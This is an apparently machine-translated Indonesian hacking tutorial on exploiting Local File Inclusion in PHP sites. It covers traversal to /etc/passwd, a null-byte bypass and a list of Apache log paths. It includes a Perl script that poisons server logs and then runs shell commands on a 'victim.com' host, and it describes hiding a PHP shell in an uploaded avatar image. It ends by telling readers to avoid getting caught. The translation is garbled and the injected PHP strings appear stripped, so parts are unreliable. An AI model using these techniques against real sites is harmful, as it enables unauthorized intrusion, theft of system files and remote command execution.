Sesuatu yang admin web mencoba dan melakukan untuk memperbaiki masalah itu adalah dengan hanya memastikan website menambahkan ". Php" ke akhir URL. Jadi jika Anda mencoba pergi ke www.example.com/test/index.php?page=../../../../../../../../../. . / etc / passwd, itu akan mencoba dan membawa Anda ke www.example.com/test/index.php?page=../../../../../../../ .. /../../ etc / passwd.php. Yang ada non, karena file yang kita cari bukan file php. Tapi untuk memperbaikinya, kita hanya bisa menggunakan sebuah nullbyte. Untuk menggunakan nullbyte, Anda hanya harus menambahkan "" ke akhir URL sebelum Anda mengirimkannya.
Nullbyte membuatnya jadi segala sesuatu yang masuk setelah nullbyte adalah "nol"

Ada banyak cara lain untuk menggunakan LFI untuk mengeksploitasi webserver. Dalam berikut, kita akan menyuntikkan kode php ke dalam log httpd, dan akses mereka melalui LFI\
 
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log.
./../../apache/logs/error.log.
./../../apache/logs/access.log 
../../../../../../../etc/httpd/logs/acces_log 
../../../../../../../etc/httpd/logs/acces.log 
../../../../../../../etc/httpd/logs/error_log 
../../../../../../../etc/httpd/logs/error.log 
../../../../../../../var/www/logs/access_log 
../../../../../../../var/www/logs/access.log 
../../../../../../../usr/local/apache/logs/access_ log
../../../../../../../usr/local/apache/logs/access. log 
../../../../../../../var/log/apache/access_log 
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache/access.log 
../../../../../../../var/log/apache2/access.log 
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log 
../../../../../../../var/www/logs/error_log 
../../../../../../../var/www/logs/error.log 
../../../../../../../usr/local/apache/logs/error_l og 
../../../../../../../usr/local/apache/logs/error.l og 
../../../../../../../var/log/apache/error_log 
../../../../../../../var/log/apache2/error_log 
../../../../../../../var/log/apache/error.log 
../../../../../../../var/log/apache2/error.log 
../../../../../../../var/log/error_log 
../../../../../../../var/log/error.log
 


Itu adalah daftar lokasi log. Sekarang kita tahu mana log, kita akan melihat di dalamnya
dan melihat apa yang mereka simpan. Dalam contoh ini, kita akan menggunakan log yang 
menyimpan "tidak ditemukan file" dan kode php. Anda kemudian akan diketik 
dalam www.example.com/ browser Anda dan kode php ini akan login, karena itu tidak ada. 
Ini mungkin tidak bekerja, karena log URL dapat menyalinnya.  
Jika Anda tidak memiliki script sendiri, Anda dapat menggunakan salah satu saya temukan di internet.
 
 
 #!/usr/bin/perl -w
use IO::Socket;
use LWP::UserAgent;
$site="victim.com";
$path="/folder/";
$code="";
$log = "../../../../../../../etc/httpd/logs/error_log";
print "Trying to inject the code";

$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site", PeerPort=>"80") or die "
Connection Failed.

";
print $socket "GET ".$path.$code." HTTP/1.1
";
print $socket "User-Agent: ".$code."
";
print $socket "Host: ".$site."
";
print $socket "Connection: close

";
close($socket);
print "
Code $code sucssefully injected in $log
";
print "
Type command to run or exit to end: ";
$cmd = ;
while($cmd !~ "exit") {

$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site", PeerPort=>"80") or die "
Connection Failed.

 
";
print $socket "GET ".$path."index.php=".$log."&cmd=$cmd HTTP/1.1
";
print $socket "Host: ".$site."
";
print $socket "Accept: */*
";
print $socket "Connection: close

";
while ($show = <$socket>)
{
print $show;
}
print "Type command to run or exit to end: ";
$cmd = ;
}
 
 
 
Simpan bahwa sebagai something.pl. Jika kode rentan dalam example.com / test / test.
php Anda harus mengubah / untuk / test /, index.php / folder = untuk test.
php = dan ../../../../ yang .. / .. / .. / etc / httpd / log / error_log  
ke tempat log di!

Script yang akan menyuntikkan kode, dan kemudian akan memungkinkan Anda untuk 
menjalankan comand pada server.


Terakhir, kita akan melihat bagaimana Anda dapat memanfaatkan 
fitur avatar upload website dengan LFI.

Anda akan perlu menambahkan kode php Anda ingin mengeksekusi ke gambar,  
untuk melakukan dengan, Anda akan perlu menggunakan hex ​​editor dan menambahkannya 
di di akhir. Atau Anda bisa menggunakan progam yang disebut edjpgcom.  
Untuk itu semua yang perlu Anda lakukan adalah klik kanan pada amiage> terbuka dengan>  
kemudian pilih program edjpgcom, kemudian ketik kode untuk menyuntikkan Anda shell.  
Setelah Anda memiliki shell anda dalam gambar, Anda perlu meng-upload ke server shell 
anda melalui hal meng-upload avatar di CP pengguna. Jika tidak nya sebuah forum Anda 
mencoba untuk mengeksploitasi, dan tidak ada cara untuk meng-upload file
Periksa apakah server hosting bersama. Untuk melakukan itu, melakukan reverse lookup 
pada website. Website saya gunakan untuk ini adalah: http://www.yougetsig...-on-web-server/

Sekarang, bagian yang rumit, Anda perlu menemukan lokasi gambar, 
dengan menciptakan kesalahan dalam gambar. Tapi, jika Anda tidak bisa
memaksa kesalahan pada gambar, Anda dapat mencoba mengklik kanan pada gambar, menyalin  
lokasi gambar, memasukkannya ke URL, dan menambahkan "?" sampai akhir. (? Yang Akan menyebabkan 
untuk berjalan, dan merupakan nullbyte yang "

Jika mereka tidak bekerja, Anda dapat kembali ke file / etc / passwd 
 username:kbeMVnZM0oL7I:503:100:FullName:/home/username:/bin/sh 
 
Seperti yang Anda lihat, nama pengguna adalah ALOS direktori, dalam banyak kasus nama mirip 
dengan domain, jika tidak meskipun, Anda harus mencoba mereka sampai Anda menemukan satu yang Anda cari.

Kembali ke gambar avatar Anda, klik kanan di atasnya, lalu salin lokasi gambar.

Pada browser Anda, kembali ke www.example.com/test/index.php?page=../../../../../../../../../location/ dari / / Anda image.jpg

Dan setelah itu, Anda akan melihat shell Anda ditambahkan ke gambar Anda sebelumnya.
Good luck, dan bersenang-senang. Cobalah untuk tidak tertangkap.
Buka Coooyyy....